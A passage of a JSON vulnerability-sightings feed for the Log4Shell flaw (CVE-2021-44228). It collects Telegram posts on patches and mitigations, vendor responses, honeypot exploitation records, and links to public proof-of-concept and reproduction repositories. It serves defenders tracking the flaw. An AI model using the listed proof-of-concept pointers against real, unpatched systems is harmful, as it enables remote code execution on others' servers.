\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u0411\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430 Log4j \u043e\u0447\u0435\u043d\u044c \u0447\u0430\u0441\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u043c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u043c \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Java. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\n\u0442\u0440\u0443\u0434\u043d\u043e \u043e\u0446\u0435\u043d\u0438\u0442\u044c \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u043e\u0436\u0435\u0442 \u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0430\u0442\u0430\u043a\u0430. \u041a\u0430\u043a \u0438 \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u0434\u0440\u0443\u0433\u0438\u043c\u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438, \u0442\u0430\u043a\u0438\u043c\u0438 \u043a\u0430\u043a \u00abHeartbleed\u00bb \u0438 \u00abShellshock\u00bb, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Positive Technologies \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0438\u0435 \u043d\u0435\u0434\u0435\u043b\u0438 \u0431\u0443\u0434\u0435\u0442 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u043e\u0432. \u0418\u0437-\u0437\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0433\u043e\u0442\u043e\u0432\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0441\u0442\u043e\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0448\u0438\u0440\u043e\u0442\u044b \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e \u043d\u0430\u0447\u043d\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\n\u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438\n\n\u0415\u0441\u043b\u0438 \u0432\u044b \u0441\u0447\u0438\u0442\u0430\u0435\u0442\u0435, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u00ab\u0423\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430\u00bb (CVE-2021-44228) \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u043b\u0438\u044f\u0442\u044c \u043d\u0430 \u0432\u0430\u0448\u0443 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Positive Technologies\n\u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0436\u0443\u0440\u043d\u0430\u043b\u044b \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u043d\u0430 \u043f\u0440\u0435\u0434\u043c\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u044f \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0439 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u0438 \u043f\u043e \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044e \u043a \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b\u043c \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f\u043c. \u041f\u0440\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u043e\u0433\u043e\n\u0441\u043e\u0431\u044b\u0442\u0438\u0439 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430, \u0438 \u043e\u0442\u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 Log4j 2 \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 2.15.0-rc2 \u0438 \u0432\u044b\u0448\u0435. \u041f\u043e \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0434\u0430\u043d\u043d\u044b\u043c, \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0443\u0441\u0442\u0440\u0430\u043d\u0438\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u041f\u041e JDK \u0434\u043e \u0432\u0435\u0440\u0441\u0438\u0439 \u0432\u044b\u0448\u0435 6u211, 7u201, 8u191 \u0438 11.0.1. \u0412 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u043c\u0435\u0440 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043f\u0440\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0435, \u0447\u0442\u043e \u0434\u043b\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b Java log4j2.formatMsgNoLookups\n\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043e \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 true. \u0415\u0441\u043b\u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043d\u0435\u0432\u043e\u0437\u043c\u043e\u0436\u043d\u0430, \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f\n\u043f\u0440\u0438\u043c\u0435\u043d\u0438\u0442\u044c \u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u043c\u0435\u0440\u044b, \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0432\u044b\u0448\u0435, \u0438 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0442\u044c \u0430\u043d\u043e\u043c\u0430\u043b\u044c\u043d\u0443\u044e \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0441\u0442\u044c \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439.", "creation_timestamp": "2022-03-25T12:28:09.000000Z"}, {"uuid": "845ee2e4-8538-4654-bf89-cf8024f2c952", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "https://t.me/codeby_sec/5613", "content": "\u200b\u041f\u043e\u0432\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0435 \u043e Minecraft: \u0438\u043b\u0438 CVE-2021-44228 \u0432 \u0446\u0432\u0435\u0442\u0435 - Log4Shell \u0438 \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u0441\u044e\u0436\u0435\u0442\u0430\n\n\u041e, \u043f\u0440\u0438\u0432\u0435\u0442, \u0430 \u0442\u044b \u0443\u0436\u0435 \u0437\u0434\u0435\u0441\u044c, \u0434\u0430? \u0422\u043e\u0433\u0434\u0430 \u043f\u043e\u0437\u0432\u043e\u043b\u044c \u0437\u0430\u0434\u0430\u0442\u044c \u0442\u0435\u0431\u0435 \u043e\u0434\u0438\u043d \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441, \u0434\u043e\u0440\u043e\u0433\u043e\u0439 \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u044c, \u043a\u0430\u043a \u0442\u044b \u0434\u0443\u043c\u0430\u0435\u0448\u044c, \u044f - \u0440\u0435\u0430\u043b\u0435\u043d? \u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0442\u044b \u0447\u0438\u0442\u0430\u0435\u0448\u044c \u043c\u043e\u0438 \u0442\u0435\u043a\u0441\u0442\u044b, \u0432 \u0441\u043a\u043e\u0440\u043e\u043c \u0432\u0440\u0435\u043c\u0435\u043d\u0438 \u0442\u0435\u0431\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0443\u0441\u043b\u044b\u0448\u0430\u0442\u044c \u043c\u043e\u0439 \u0433\u043e\u043b\u043e\u0441, \u0441\u043a\u043e\u0440\u0435\u0435 \u0432\u0441\u0435\u0433\u043e \u0442\u044b \u0443\u0436\u0435 \u043f\u043e\u043d\u044f\u043b \u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u043d\u0435 \u043b\u0435\u0442, \u0430 \u043a\u0430\u043a\u043e\u0432 \u0432 \u044d\u0442\u043e\u043c \u0441\u043c\u044b\u0441\u043b \u0438 \u0447\u0442\u043e \u044d\u0442\u043e \u0434\u043e\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442?\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u044c\u044e: https://codeby.net/threads/povestvovanie-o-minecraft-ili-cve-2021-44228-v-cvete-log4shell-i-nemnogo-sjuzheta.79515/\n\n\ud83d\udcdd \u0428\u043a\u043e\u043b\u0430 \u041a\u043e\u0434\u0435\u0431\u0430\u0439 |\ud83c\udf7f YouTube |\ud83c\udf00 \u0412\u041a\u043e\u043d\u0442\u0430\u043a\u0442\u0435\n\n#log4j #cve", "creation_timestamp": "2022-02-27T17:17:12.000000Z"}, {"uuid": "fa29d338-d26f-44df-a6ff-3e7a27688b86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-27)", "content": "", "creation_timestamp": "2026-04-27T00:00:00.000000Z"}, {"uuid": "39759e3f-4714-405e-81b9-27e467d83580", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ckuRED/82", "content": "Trend Micro's Web Based scanner for CVE-2021-44228 aka Log4Shell.\n\nlog4j-tester.trendmicro.com", "creation_timestamp": "2021-12-16T07:33:59.000000Z"}, {"uuid": "175b1e69-e65d-4623-aed6-b9d88b10df2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-25)", "content": "", "creation_timestamp": "2026-04-25T00:00:00.000000Z"}, {"uuid": "e6feacb0-cda5-4c80-bf18-fffeb32e3f09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "6b6850c2-8bce-4d54-9413-0758aeb7c0b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "5447231b-c4cc-44a4-8db4-22956aacf50e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2026-04-26)", "content": "", "creation_timestamp": "2026-04-26T00:00:00.000000Z"}, {"uuid": "e3b71d9e-199d-4631-84dc-d63a0e613e92", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/RRp_g7glapTVycBJmNkkdTv_1kUKlchCKIwh8LoOwZ-XwIs", "content": "", "creation_timestamp": "2026-04-19T21:00:04.000000Z"}, {"uuid": "5b7ea796-7fe5-499b-aeee-11a2c3fcc810", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/dzDW2h-886XV-6aRi3WJqtQJrVieQigoxoc1-2T9QA1v8VU", "content": "", "creation_timestamp": "2026-04-23T03:00:06.000000Z"}, {"uuid": "47882171-8479-44c5-87fc-f7cf7f795119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2948", "content": "\u0412 \u0441\u0432\u044f\u0437\u0438 \u0441 \u044d\u0442\u043e\u0439 \u0432\u0441\u0435\u0439 \u044d\u043f\u043e\u043f\u0435\u0435\u0439 \u0441 \u043b\u043e\u0433\u0430\u043c\u0438 \u0432 Java \u043f\u043e\u0434 \u0440\u0430\u0437\u0434\u0430\u0447\u0443 \u043f\u043e\u043f\u0430\u043b logback\n\n\u0417\u0430\u0434\u0430\u0447\u0430\nPossibility of vulnerability\nhttps://jira.qos.ch/browse/LOGBACK-1591\n\n\u0418 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435, \u0433\u0434\u0435 \u0430\u0436 \u0431\u043e\u043b\u044c\u0448\u0438\u043c\u0438 \u043a\u0440\u0430\u0441\u043d\u044b\u043c\u0438 \u0437\u0435\u043b\u0451\u043d\u044b\u043c\u0438 \u0431\u0443\u043a\u0432\u0430\u043c\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043b\u0438\n\n&gt; We note that the vulnerability mentioned in LOGBACK-1591 requires write access to logback's configuration file as a prerequisite. Please understand that log4Shell/CVE-2021-44228 and LOGBACK-1591 are of different severity levels.\n\n\u0418\u0437 \u0442\u0435\u043a\u0441\u0442\u0430 \u0440\u0435\u043b\u0438\u0437\u0430\n\nIn response to LOGBACK-1591, we have disabled all JNDI lookup code in logback until further notice. This impacts ContextJNDISelector and  element in configuration files.\n\nWe note that the vulnerability mentioned in LOGBACK-1591 requires write access to logback's configuration file as a prerequisite. Please understand that log4Shell/CVE-2021-44228 and LOGBACK-1591 are of different severity levels. A successul RCE requires all of the following conditions to be met:\n\n- write access to logback.xml\n- use of versions &lt; 1.2.8\n- reloading of poisoned configuration data, which implies application restart or scan=\"true\" set prior to attack\n\nAs an additional extra precaution, in addition to upgrading to logback version 1.2.8, we also recommend users to set their logback configuration files as read-only.\nhttp://logback.qos.ch/news.html\n\n\u0422\u0430\u043a \u0447\u0442\u043e \u0432\u0440\u0435\u043c\u044f \u043f\u043e\u0439\u0442\u0438 \u0438 \u043b\u0438\u0448\u043d\u0438\u0439 \u0440\u0430\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0432\u0430\u0448 logback \u0438 \u043a\u0430\u043a \u043e\u043d \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f.", "creation_timestamp": "2021-12-15T12:24:08.000000Z"}, {"uuid": "f74f80ee-04d7-4043-a72a-f4b924ee971f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/ckuRED/78", "content": "Python Log4RCE PoC | Log4Shell | CVE-2021-44228\n\nhttps://github.com/alexandre-lavoie/python-log4rce", "creation_timestamp": "2021-12-12T12:10:43.000000Z"}, {"uuid": "e2db008b-2f9f-474e-9765-12cf588a601c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/41461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1a\u6f0f\u6d1e\u590d\u73b0\n\u63cf\u8ff0\uff1aCVE-2021-44228 Vulnerability Reproduction Environment CVE-2021-44228 \u6f0f\u6d1e\u590d\u73b0\u73af\u5883\nURL\uff1ahttps://github.com/x1ongsec/CVE-2021-44228-Log4j-JNDI\n\n\u6807\u7b7e\uff1a#\u6f0f\u6d1e\u590d\u73b0", "creation_timestamp": "2025-06-22T14:37:07.000000Z"}, {"uuid": "8e1fca4d-0617-4205-b737-d3bc206fc9b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/GithubRedTeam/35867", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aTools for remediating the recent log4j2 RCE vulnerability (CVE-2021-44228) log4j2, remediation, tools\nURL\uff1ahttps://github.com/separatecalo/log4j-remediation-tools\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-05-07T06:29:45.000000Z"}, {"uuid": "b49d4b36-6b85-4673-a1cb-4247b98e5f96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2965", "content": "\u0412\u0441\u0442\u0440\u0435\u0447\u0430 \u0441 CVE-2021-44228 \u0438\u043c\u0435\u043d\u0438 Log4j2 \u0432 \u043d\u0435\u043e\u0436\u0438\u0434\u0430\u043d\u043d\u043e\u043c \u043c\u0435\u0441\u0442\u0435\n\n&gt; After the initial fix in Log4j v2.15 was released, a new issue CVE-2021-45046 was found and addressed in log4j v2.16. We have since released Arduino IDE 1.8.18, available here, which includes log4j v2.16 with the latest fix.\n\nArduino's response to Log4j2 vulnerability CVE-2021-44228\nhttps://support.arduino.cc/hc/en-us/articles/4412377144338-Arduino-s-response-to-Log4j2-vulnerability-CVE-2021-44228", "creation_timestamp": "2022-01-04T11:40:02.000000Z"}, {"uuid": "e17e3295-33ec-4a24-a87f-4ee3f8633ab3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/tech_b0lt_Genona/2947", "content": "\u041c\u044b \u0434\u0443\u043c\u0430\u043b\u0438, \u0447\u0442\u043e \u0432\u0441\u0451, \u043d\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0441\u0451. \u0422\u0435\u043f\u0435\u0440\u044c \u0441 log4j \u0435\u0449\u0451 \u0434\u043e\u043b\u0433\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435 \u0441\u043b\u0435\u0437\u0443\u0442. \u041f\u043e\u043a\u0430 \"\u0432\u0441\u0435\" \u0431\u0430\u0433\u0438 \u0442\u0430\u043c \u043d\u0435 \u043d\u0430\u0439\u0434\u0443\u0442.\n\nLog4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046)\nhttps://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/\n+\nIt was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.noFormatMsgLookup` to `true` do NOT mitigate this specific vulnerability. Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (&lt;2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-45046", "creation_timestamp": "2021-12-15T09:21:34.000000Z"}, {"uuid": "7d3a7ac2-e68c-490d-b666-18afa0edf0b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/JusVb9Cc6NiD4ZV5qyRFR5F7ymVUdBlx_MvN3LUfquoayMc", "content": "", "creation_timestamp": "2025-09-10T14:18:42.000000Z"}, {"uuid": "3c23d761-06bd-4034-ba64-ee142995621e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "published-proof-of-concept", "source": "Telegram/iE_s2wqAuT8xlw-ZjjldWH32bIYCcXYhyI8TabyOKDe-DfM", "content": "", "creation_timestamp": "2025-09-27T15:00:07.000000Z"}, {"uuid": "05075aca-57e4-40a6-8e52-1e03a9271ee9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/habr_com_news/2042", "content": "\u200bApple \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u0432 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u043c \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 iCloud \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell\n\n\u041f\u043e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 9to5Mac, Apple \u0437\u0430\u043a\u0440\u044b\u043b\u0430 \u0432 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u043c \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 iCloud \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Log4Shell \u0432 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0435 \u043b\u043e\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Log4j, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043d\u0430 Java. \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Log4Shell (CVE-2021-44228) \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0441\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0438 \u0441\u043b\u0443\u0436\u0431\u044b, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0435 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0443 \u043b\u043e\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f Java, Apache Log4j \u043c\u0435\u0436\u0434\u0443 \u0432\u0435\u0440\u0441\u0438\u044f\u043c\u0438 2.0 \u0438 2.14.1, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u043b\u0443\u0436\u0431\u044b \u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u043d\u0430 Java. \u0421 \u0435\u0435 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u0435\u0431-\u0441\u0435\u0440\u0432\u0435\u0440\u0443 \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.\n\n#Apple #\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 #iCloud", "creation_timestamp": 